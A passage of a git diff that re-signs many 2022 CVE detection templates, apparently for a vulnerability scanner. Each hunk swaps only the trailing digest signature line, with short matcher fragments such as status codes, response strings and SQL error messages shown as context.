490a0046304402204c545baba6f000738426962034ba97b795abc508950ae773e0f5efe6248d75cd02205824ebd4b1a42f15cfa6c57b4e1e4fcbe6eac42f725dbb8c0e1e649e1f044c9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0693.yaml b/http/cves/2022/CVE-2022-0693.yaml index 8d2bd3a882..c90a2d731c 100644 --- a/http/cves/2022/CVE-2022-0693.yaml +++ b/http/cves/2022/CVE-2022-0693.yaml @@ -46,4 +46,4 @@ http: - 'status_code == 200' - 'contains(body, "Post Meta Setting Deleted Successfully")' condition: and -# digest: 490a0046304402207093cf93f147e7915511f8d5d2790725c9454030a767b763d349539e7390c37d022033999adb74a9c2868950580b62d5f9d7ac666d555b7f211a4bb473c58e6147bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204f01877da9668618a31c134174c0b1db2eeb1fd33ee26b77bdd0fed4b5a611dd02206407d8588548171f5e8dc630122584d4c228b43379770ceaa7dfd300e960c4e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0735.yaml b/http/cves/2022/CVE-2022-0735.yaml index 63d351902a..2324bd77ac 100644 --- a/http/cves/2022/CVE-2022-0735.yaml +++ b/http/cves/2022/CVE-2022-0735.yaml @@ -112,4 +112,4 @@ http: group: 1 regex: - '(?:application-)(\S{64})(?:\.css)' -# digest: 490a004630440220282a39a1d484373d5c256426da634f467af67ef2885981e93aa49d67e407466d0220644ff375604f1e48db56538b13a3bb3e2a6b0224059239db0c5e8fa99f03e063:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206ac69e4ff94859665b85f9af28b56bb3a1b2785b4718fbb7c6a5374cac45086f022100a9024c393396acc395eba7ba18795618a16f1f4a8cc286ef5a0164e4a832ab2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0747.yaml b/http/cves/2022/CVE-2022-0747.yaml index 615f112b9e..91dc1bd0c2 100644 --- a/http/cves/2022/CVE-2022-0747.yaml +++ b/http/cves/2022/CVE-2022-0747.yaml @@ -52,4 +52,4 @@ http: - 'contains(content_type_2, "text/javascript")' - 'contains(body_2, "show_ilist_templates")' condition: and -# digest: 4a0a0047304502204fd8230c089cad93c94effd40fb9c114ad671d8a70d86a3c94b988923bf8f3a2022100e6190daebd017decedfd78c96cd5e4b2ab2842f0dbbb32bb89afd1f3f9b64a66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220659dd6e81b56b7ad2ca5e164674d68e908074273a0e522aa11bbe64016520f3a02207cd44466e380af3765f85808195b17dc6e318a354fb70704520099f6e978103e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0769.yaml b/http/cves/2022/CVE-2022-0769.yaml index 1d069ca3aa..bcd8a6a5d5 100644 --- a/http/cves/2022/CVE-2022-0769.yaml +++ b/http/cves/2022/CVE-2022-0769.yaml @@ -50,4 +50,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "You have to be logged in to leave your rate")' condition: and -# digest: 4a0a00473045022021e45531cc08e1a67e8853d335d389bf1297ae9b141d21374fa16eac86663f31022100fec13db752fa9a4c514c443c52cf5e5d70753d0a06977056ce21d613825a1d55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202c86f8644cb483f5c622c81dc5f3c84f10db3835fa21a49497270c6ef42cc868022100d4fcdb326b1bb65c5056f8e677aad1fe82328ed18bc6d80f5890f2456e405b8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0776.yaml b/http/cves/2022/CVE-2022-0776.yaml index 931bfa16ab..9022e2380b 100644 --- a/http/cves/2022/CVE-2022-0776.yaml +++ b/http/cves/2022/CVE-2022-0776.yaml @@ -48,4 +48,4 @@ headless: part: extract words: - "true" -# digest: 4b0a004830460221009720f8c313e9c7bfe1e691d95cd242fb5bdd57b13ac1db4e917f6c39f52fbea2022100c9c3f23d0e64a915bbec12c1a178053c1af95773255438a75685716f084fda92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100918dfe2d73769e2b4c3bf2fe3d647e9f1d5a1d315aef145c8b3552d918e65b6f02206e511fac20471835f42d89807cf41b10064b97086e2c26cd3376050c419c09ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0781.yaml b/http/cves/2022/CVE-2022-0781.yaml index 9d9eb411b4..983e344636 100644 --- a/http/cves/2022/CVE-2022-0781.yaml +++ b/http/cves/2022/CVE-2022-0781.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009bc3bdd1d25b20570bb97ffa18d54c7a6df5e7cb397b45c34bf366aef2e54266022100b253fd18bf2cf947e7cdf40ec6c0b2795fae016039491774afe30f62dcd0b397:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d607d59765f03f5697958441c06c4feacda1990edc1bcb64397c92a15ce31d76022100c4a4931ca47ebfd34da937cb77a51e33542b805be7b32aae99260092e75c2522:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0786.yaml b/http/cves/2022/CVE-2022-0786.yaml index 3073a46d3b..937ff593aa 100644 --- a/http/cves/2022/CVE-2022-0786.yaml +++ b/http/cves/2022/CVE-2022-0786.yaml @@ -47,4 +47,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "Doctor details")' condition: and -# digest: 4a0a00473045022036530e0f9ae477a8fa20086d2368da5051b7815179a0d0d31f8c460aaac6b6770221009c700491601f4d7a8a702439cd1625a83ec688c8ca07c8833a80232e7822702e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202a56024067a27384463e32cf94905a97b100cc76d3a7f2e0129ad457e5630b20022100bb7206169a39c10a0a38f769961c00d3cbb7a2b161ead9618270e7b6ace9395a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0787.yaml b/http/cves/2022/CVE-2022-0787.yaml index 168f458082..a727c46818 100644 --- a/http/cves/2022/CVE-2022-0787.yaml +++ b/http/cves/2022/CVE-2022-0787.yaml @@ -46,4 +46,4 @@ http: - contains(header, "text/html") - contains(body, 'iTotalDisplayRecords') condition: and -# digest: 4b0a00483046022100c1aca59874a1ae5dbddc544a985631c3196d79d93a06d7eb676e0885d866551e022100c26d30938d63fcee09cacd868fd8024c89aa2ecbba213e24ecf874ca84b518ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100df4f7156bb701e694be126c2abe6eb09e5622b1cead273ab0e888a73d87dce8a02206a9b7211d792d45b6daaee2e7c7258fb8bcae7c9f8266b6b0312c01be218ec65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0814.yaml b/http/cves/2022/CVE-2022-0814.yaml index 948e02ad78..2df77716c9 100644 --- a/http/cves/2022/CVE-2022-0814.yaml +++ b/http/cves/2022/CVE-2022-0814.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009d0af829a2026e1cbcd7a5b53b3113160e4aa16d2d3f2783e0c08139ae359b11022100fe9df65b9b640062afc5b0aad1fd9ba391be5046758f6b0eda26ff19ed069318:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022010bc2189231d243f08e665fb4a3b7569d771cde4b863887ee13498f58412906702205acc4428a2d8c2bd4452c096dc6361446e33a22431e8c1ec46b3b9bfaf8e9991:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0817.yaml b/http/cves/2022/CVE-2022-0817.yaml index 262e62b79d..eb4abc76ea 100644 --- a/http/cves/2022/CVE-2022-0817.yaml +++ b/http/cves/2022/CVE-2022-0817.yaml @@ -51,4 +51,4 @@ http: - 'contains(content_type, "application/json")' - 'contains(body, "badgeos-arrange-buttons")' condition: and -# digest: 4a0a0047304502204ed17f358a76423c2881abee152da028f535f1868fa7a4531bec8dc26c95903a022100b370a2e1efe65aa0424718e64d256cc337cb4757007a14f0391f132d7ac09294:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203d2db6c67edc8ede8fe11881f8d7fc0bf4d39da48d81012d66509c26e29891b60220295f9c0f3a87ec6903ee013a498d4178afa1ea2260992d56b162bf4b683f237a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0824.yaml b/http/cves/2022/CVE-2022-0824.yaml index ae695e1fd7..401e43baac 100644 --- a/http/cves/2022/CVE-2022-0824.yaml +++ b/http/cves/2022/CVE-2022-0824.yaml @@ -63,4 +63,4 @@ http: part: body words: - "Failed to write to /{{ranstr}}/index.html" -# digest: 4b0a00483046022100f880792facd5c0e768f8ad124c2243e00a94c1c7ec0485023cc33e76ab1be562022100fa1fd25ccd3f731f94205d3572305c156be2fe3431183e251164deffd8ff666c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210096ccef622d932061954ecb20771f9429a01c8cc52f204f7870a6fb7add50da25022100c6e797053ae193bb544e2867fa52ebe9d9b6a9dd54f96da3f50e0ab4556e7f8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0826.yaml b/http/cves/2022/CVE-2022-0826.yaml index 7e7f384310..65d995b0c0 100644 --- a/http/cves/2022/CVE-2022-0826.yaml +++ b/http/cves/2022/CVE-2022-0826.yaml @@ -50,4 +50,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "Registred videos :")' condition: and -# digest: 490a00463044022071c4c48361e7e80e3c9bb8e70b79bd629c31046abfbc032f2bbd8dadc1eeeee102206dd51f47c011042015375863e28a3ed948f9dad86b14ae9733108e39a9280586:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b0745427434292ab72e2d5edeba4a29bea7509eec4aa3484ecbb37faa46d42fc022100dd3a287ead57d36282eddb6ecb7bc9d9159c4f8f35e013e8b08eab4f3bf0ad8f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0827.yaml b/http/cves/2022/CVE-2022-0827.yaml index 3763e4c54c..8703340f0b 100644 --- a/http/cves/2022/CVE-2022-0827.yaml +++ b/http/cves/2022/CVE-2022-0827.yaml @@ -49,4 +49,4 @@ http: - 'status_code == 200' - 'contains(body, "Account added successfully")' condition: and -# digest: 4a0a00473045022100fdaa23a706a5b809eb01cf6c5417173600770a25c5fa585784f320d941cd5c940220025f8f4ce8dba7434e925dbb49e99b313ed7831bcbc38ecd5181ff5bdbca7470:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100db95e6660d66b18ab8ce734b9b438e2a4d2626c8b35c7227bb18ddde1a18bcdc022100fb81b33fe69ad1b275eaf4390e07eeb8d34f9fc1035eb938f7f1be4fcb30a916:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0846.yaml b/http/cves/2022/CVE-2022-0846.yaml index 27deefaff5..9d8b1a34bf 100644 --- a/http/cves/2022/CVE-2022-0846.yaml +++ b/http/cves/2022/CVE-2022-0846.yaml @@ -49,4 +49,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "Your signature has been added") || contains(body, "This petition has already been signed using your email address")' condition: and -# digest: 490a00463044022060b8218674dd2c6a455a4bdba31e1b06ace9bacee0309165f804c75a860941eb022045c5acaccf4d06228363bf686e665ba42599b1a99820b52f999c8fa5b87d836b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f67741c7268f279cb65aeea7bd6e21006ec7fbc140f16c09292fd7324b7e65c3022008a10fbbc882ad6157306fc6fe18a7bba2b682010957afea63ab318c8a1406e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0864.yaml b/http/cves/2022/CVE-2022-0864.yaml index e932178228..93263dc5bd 100644 --- a/http/cves/2022/CVE-2022-0864.yaml +++ b/http/cves/2022/CVE-2022-0864.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d231078095447bd320631039dee869d6cbb6aa41162ce4d20df62ebb5f1fcf600221009d1396e605fd7dc03ef58d5bc874856dd17cbcc41ed9047bf399b019c4c91c88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200febb57e8c3aee4b73313a8bdf73df55aebca0fa768eea9cbbdeca86b8e581b102200158e5d4e0144d1ee628524d74a96da960a4b063fb2ebb80b84393c07f025e21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0869.yaml b/http/cves/2022/CVE-2022-0869.yaml index 180e5f5564..5de49b06fa 100644 --- a/http/cves/2022/CVE-2022-0869.yaml +++ b/http/cves/2022/CVE-2022-0869.yaml @@ -42,4 +42,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' -# digest: 4a0a0047304502205f7a431a1649486ee22a9408603c8699c32de96758253b4cdc2852c7bb979bdd022100f3a079da60a0b3dd22de503efd972c7c4d3e5773e0198087792b6b41e44e2e81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210090eae382645539cce8db7d5c8d08ad1759ba21131b4f6693fff4407f162bcc86022037497212dd6b50dfcd452c9c06ce37bef3fa61e3bff4324b112ad89b1e7c357b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0870.yaml b/http/cves/2022/CVE-2022-0870.yaml index d01307aa57..7e3c3efc29 100644 --- a/http/cves/2022/CVE-2022-0870.yaml +++ b/http/cves/2022/CVE-2022-0870.yaml @@ -81,4 +81,4 @@ http: regex: - 'name="_csrf" content="(.*)"' internal: true -# digest: 490a0046304402206862f6cedae78e1be7b3fb449423df989aba5f79a58464dfdf723627158a590e022079c3eec48989b675d19b20bf089dfef10998b5f291e5177a0b9b7862808b8345:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022034f359e6da198c9aa9d59b835bfa4da0c47d374d219d228481faacd36d1b8d2b022100e512d964c5f4bf885f34d4645822aa764cee7504a39714416fff903295205135:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0899.yaml b/http/cves/2022/CVE-2022-0899.yaml index feaf9c8580..2a0fcfc60a 100644 --- a/http/cves/2022/CVE-2022-0899.yaml +++ b/http/cves/2022/CVE-2022-0899.yaml @@ -46,4 +46,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "All Snippets")' condition: and -# digest: 4a0a00473045022100de5655af7dd9e8da3c4f797daac5beef773d572d7195389759a54ac348e8f53a022018b87700a693d57acf16843d51cab1a1b175bb6f6adf15e7c587624d26924d2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b32980c7114cd709456c3dc2981fea5cc461cdceea2fa72435ff2eaef203ffec0220073fa37edb8092f60568dcfaf1f76c0222a33a59781499c8ecea5fcbb9e667b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0928.yaml b/http/cves/2022/CVE-2022-0928.yaml index 1343c036b1..48a849cc41 100644 --- a/http/cves/2022/CVE-2022-0928.yaml +++ b/http/cves/2022/CVE-2022-0928.yaml @@ -63,4 +63,4 @@ http: - 'contains(header_3,"text/html")' - 'status_code_2 == 200 && status_code_3 == 200' condition: and -# digest: 490a0046304402204ec58d792beffdddd8520a47f39f107684b58874e924abe866191347ce01799d02206680604020300f5244d9e78173a6d9fefe3050b027124abbce04f1294a65198d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f8bce570ebcb0f0d74eb041be1b52f254423a5768d3117aec796b360a124d195022100df65a65f7f5fa7a95872506df64e5f6d57b4e0e1279520187fc48d4f5a57ee19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0949.yaml b/http/cves/2022/CVE-2022-0949.yaml index b782b6673e..5893e57577 100644 --- a/http/cves/2022/CVE-2022-0949.yaml +++ b/http/cves/2022/CVE-2022-0949.yaml @@ -61,4 +61,4 @@ http: - 'status_code_2 == 200' - 'contains(body_3, "commentform")' condition: and -# digest: 4a0a004730450221009e46e7428c959e0b3480658a00e0a29e457a923114b749eb990552af2bcbb63102201d59805ee70142e2c08631780022d7fb2b0422d7a8099c53176239a8a5e3a374:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c9ec786e4d6dc6fef58e041447d7c41a0faee26b64048540df3166806e3b262d02202bde8319975e640eca903001b951c5994d5a9235422120bd5124fe19648dde1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0954.yaml b/http/cves/2022/CVE-2022-0954.yaml index f5d82c6ace..b79d93e52a 100644 --- a/http/cves/2022/CVE-2022-0954.yaml +++ b/http/cves/2022/CVE-2022-0954.yaml @@ -64,4 +64,4 @@ http: - 'contains(header_3,"text/html")' - 'status_code_3==200' condition: and -# digest: 490a00463044022000cc9a8206ccbc823b71b7d11682af57eb62c7cd6d15308e393af5d9460b13a00220128133adc23ad3f11a14baec1fdfa7049669509da1033a5bb705a1ccb4e4e650:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207e4a03981dc32fe14244fb81dc5fbf27e611f0610881b12bab441ef665f244ce022100ca4d7b70e4c8aade25ea13a241809d1a4a6e8fcc75dabfbd42f23db0314190ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0963.yaml b/http/cves/2022/CVE-2022-0963.yaml index 8a414bcd31..ef21a9ce0f 100644 --- a/http/cves/2022/CVE-2022-0963.yaml +++ b/http/cves/2022/CVE-2022-0963.yaml @@ -74,4 +74,4 @@ http: - 'status_code_3==200' - 'contains(body_2,"bytes_uploaded")' condition: and -# digest: 4a0a0047304502204c9a4e25aee3216da25fd050f68cf7c0e5b0a4e65532f9f62d4b83f5058333e2022100dda270d1c7edbe6d34680d6f67ca827c790c9c53883fb2789a999d65b493962e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e2d8f53b3f53eb6ddda6130f5f72bc085998bfcec56f9b2260573d215a2aef76022100cb30d3fe32e752b77aaeb9d16dfcd6db7be9b17e1f600c0c4ac6f59d56350341:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0968.yaml b/http/cves/2022/CVE-2022-0968.yaml index e1cd0ce752..20f2bab0f9 100644 --- a/http/cves/2022/CVE-2022-0968.yaml +++ b/http/cves/2022/CVE-2022-0968.yaml @@ -83,4 +83,4 @@ http: - '"' - 'smartertrack' condition: and -# digest: 4a0a00473045022100b4892f5c64f6232351379b197d1871d961f0b6c1bfe2c35aa9ec6b1fe287a6f202203f5de83f46a950369d103b2ff3e6f864c4508f0b7fbbef2ffdd5ae4281720fcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e70d6d27e721e746a4f0f86c1a92c805c1750d983b403dae855bae8c048c157d0220008df64d41140572b4cf3da2514861c52335e045fbe683a179aee63fee0dd259:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-24627.yaml b/http/cves/2022/CVE-2022-24627.yaml index d3cb312564..4de131b055 100644 --- a/http/cves/2022/CVE-2022-24627.yaml +++ b/http/cves/2022/CVE-2022-24627.yaml @@ -56,4 +56,4 @@ http: - "mysql_fetch" - "You have an error in your SQL syntax" condition: or -# digest: 4b0a00483046022100961135146cb72e5ec123441fa9ff5dac7ec092b87f38888f1877ff1a5aa84f1c0221009e345921fc3a9094d5fd253bed1e6361bfae6d60ab6455dcfdafe7658a132668:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ba45b549e145408af633369b555485543fadac44bdd9055d24dd3b1aa2b7e6810220618bc9f7d62c05f168255ce97860dc0e76204349a61ffc57a6cefa9bf39a650c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-24681.yaml b/http/cves/2022/CVE-2022-24681.yaml index 0153e3b3d4..a7845152f0 100644 --- a/http/cves/2022/CVE-2022-24681.yaml +++ b/http/cves/2022/CVE-2022-24681.yaml @@ -62,4 +62,4 @@ http: - '"BUILD_NUMBER":"([0-9]+)",' internal: true part: body -# digest: 4a0a00473045022100bb98caa57ec6e3ed65dcc5cfbfe03e4b587538e5e968b2097fac7c24343595bf022024df61662ad6dcdb68cd5e6cc916990b9854a8d8e027ac7f1651aee87880932c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e403ff912f48b0e4fc56a34aec2e8071bef293f7da2685cf615e8936416b411e0220071346853de912a910b2ce5e9e08fb45b83a98a0613c4a4c853eede70a3a4d7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-24716.yaml b/http/cves/2022/CVE-2022-24716.yaml index e61feb47cc..0859f89d5c 100644 --- a/http/cves/2022/CVE-2022-24716.yaml +++ b/http/cves/2022/CVE-2022-24716.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c9539549dcfc756f1d0a2325969b03be5a4a019f130c94dca75be9859b0aa649022100dfa8df926228c77eb9d9593dcb7e8189e5d91eb3209ecf64297b5454a6c8cf88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b49c9a139031348d88e1292989218d050053caab0f929919163e12f6acd9755602207766eeef16b7181d17e57c0c9c44a82352ad8c1e21b61fd731ef973885726d87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-24856.yaml b/http/cves/2022/CVE-2022-24856.yaml index a877ca379b..059eb71d6d 100644 --- a/http/cves/2022/CVE-2022-24856.yaml +++ b/http/cves/2022/CVE-2022-24856.yaml @@ -39,4 +39,4 @@ http: - type: word words: - "Interactsh Server" -# digest: 490a00463044022011000b62bbdc9d5f28cdb1540f0177002809856e4f065b19296986952d6abac5022034c9d32e197b3f27d3f1d38e02891c4f95987145301f02da2555758516aef94e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ff5d90ca1d1b3da79372b1c211aaf83b4277abd36a80660e3cc2f2bb28b3af45022100a49d063ce970aff4bdd77c900a20eaa28edf17a3776039d446672ff67dc6c462:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-2486.yaml b/http/cves/2022/CVE-2022-2486.yaml index 65623c2276..b15f8f3661 100644 --- a/http/cves/2022/CVE-2022-2486.yaml +++ b/http/cves/2022/CVE-2022-2486.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 500 -# digest: 4b0a00483046022100b34c9aac4b9a1b672c0d52fd667187a1d74768987e33b4d41b8b694a9f5802f5022100ed27bf9f661bb4e7471c509027150bf34f2905d0b15ff35d6fcd1b08022ad4ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210099cf7b401d12d74ed6b3e3cb7843ae70994f0020a30ef42cae07410922e0d799022100c732b7f6cb38a4fdb450bf0c3f513ea4197bf67458c16c953bb5842e6f30a2b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-2487.yaml b/http/cves/2022/CVE-2022-2487.yaml index 8dedab97e0..7092a9c79e 100644 --- a/http/cves/2022/CVE-2022-2487.yaml +++ b/http/cves/2022/CVE-2022-2487.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 480a00453043022063c0e55419c9314aa4179cbc620cda3fb24c5a8ec5f8a5bf570b4744cf6fd2d4021f5a44d8882c4a8b74f1f1a6a3d2651b10ecd553f39eb188a71f5c135ab2cde4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bc612064e3643df18f893c74277d70fb9a15f6e13eb9f85f3a0a3bb6126f3aad02203177b61a36e74d7ad2cd14484de16a71d302ce8247adacd4eeb7d5eecb5a0920:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-2488.yaml b/http/cves/2022/CVE-2022-2488.yaml index e2316e3ad5..a602a3869f 100644 --- a/http/cves/2022/CVE-2022-2488.yaml +++ b/http/cves/2022/CVE-2022-2488.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 500 -# digest: 4a0a004730450220356cde1b887b5746d09e420786e7774b8306e1e99f930120cb47996c24a275b2022100a3c3b2747f775e12938742f69218d9d03766d557418c26f563d6c42da95b6326:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ade2be3b76793478fedfa3024140b02e074968d76d3d8baf0b3309c3eb528c670220702937b18bd3eda17f033654fd689cf0ba239e82e0804bd4ee53eb336caed0cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-24899.yaml b/http/cves/2022/CVE-2022-24899.yaml index 177e89d6c2..003da4d752 100644 --- a/http/cves/2022/CVE-2022-24899.yaml +++ b/http/cves/2022/CVE-2022-24899.yaml @@ -50,4 +50,4 @@ http: part: header words: - text/html -# digest: 4b0a00483046022100dd79aa0474a89a2ac03e8147296d8958bd8863792570ee2d226ce4ef2bb5fe47022100f21bdc20c0df7169bf401f396d4d70048dddd98be918337c91d990bd543060b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022041033a219f77db0b218a8c5c9051700448dd1a31a46099f056f2d466e1ade55202202c4b80b0623b0b70c68495ceefcec3005b91cf5c32dc9efef87c34b544d07c2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-24900.yaml b/http/cves/2022/CVE-2022-24900.yaml index 1380d9c461..06f3feb2cf 100644 --- a/http/cves/2022/CVE-2022-24900.yaml +++ b/http/cves/2022/CVE-2022-24900.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220769f0b22c82a753d0e8d77f012b14207ab4c56507605203f5ed415c7de1fcce0022100b0dfc7497219b96863930792f0fc57dd921a58d19ee3eccdbb2cbe6364059fc6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ce258f974df3c8faf060626f029d8f885e495283935d860f7aaad4bee6bac842022069960f0fba62fbb5c1b815fa7c52e882675d6750af21c7c29ba98373226c8c81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-25082.yaml b/http/cves/2022/CVE-2022-25082.yaml index 98e6deb6ea..5b18ee3fda 100644 --- a/http/cves/2022/CVE-2022-25082.yaml +++ b/http/cves/2022/CVE-2022-25082.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ab2d16fe98044552f6b033c5d66ef9d749c2577f4ba89980e3804e6e0961c42002204911d612998bfb262eb6fdacd0a6fc2a9e74331eeba778603ed15a039ec9d16b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f8de283883e3fdfd1e54268406adbc0d6a29efc03623b6530af3ae535d385443022100f0f801a792b1ae39a2af7999cf7a6942f263f25a2b2f3d6786a0cdc1cb223cc6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-25148.yaml b/http/cves/2022/CVE-2022-25148.yaml index 622ea8f31c..9b2466f4cd 100644 --- a/http/cves/2022/CVE-2022-25148.yaml +++ b/http/cves/2022/CVE-2022-25148.yaml @@ -60,4 +60,4 @@ http: regex: - '_wpnonce=([0-9a-zA-Z]+)' internal: true -# digest: 4a0a00473045022100ca848fcb45e23d7d210462b4aa7c89510aa622fe4bb4c0639f5035c1e09b2a5902205b9422a4700bd06f51bc7edd9a951403e9ad2145500336c3690f7beed9414f5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c1b3089f521497de75a298ec2b19e76ba63b440b3be4c4d1992763acf0111ec10221009de03d65b6ddf4245ec60b34a6670600703456d29976cbc448386780ec3e0e38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-25149.yaml b/http/cves/2022/CVE-2022-25149.yaml index a39264b6c3..cfd50046d3 100644 --- a/http/cves/2022/CVE-2022-25149.yaml +++ b/http/cves/2022/CVE-2022-25149.yaml @@ -59,4 +59,4 @@ http: regex: - '_wpnonce=([0-9a-zA-Z]+)' internal: true -# digest: 4a0a00473045022100f3ab364d23921ccdb931455c9ebd80865bd26ddd8d85a85e5c2f6fc86842424e022068720cfe546b2bb14a734450dfc5bdad56751bcdaef77f99acb548fddcb1ac38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210084f2ef26eebc2ab228387073ab5586b446941d803b2fa941c7b7294dcc365f64022100b10e0d2b493485ad23cdee2ee00592ddc459576e58f2fb9d306f92129672792c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-25216.yaml b/http/cves/2022/CVE-2022-25216.yaml index d7cb89b2fb..9850f623cb 100644 --- 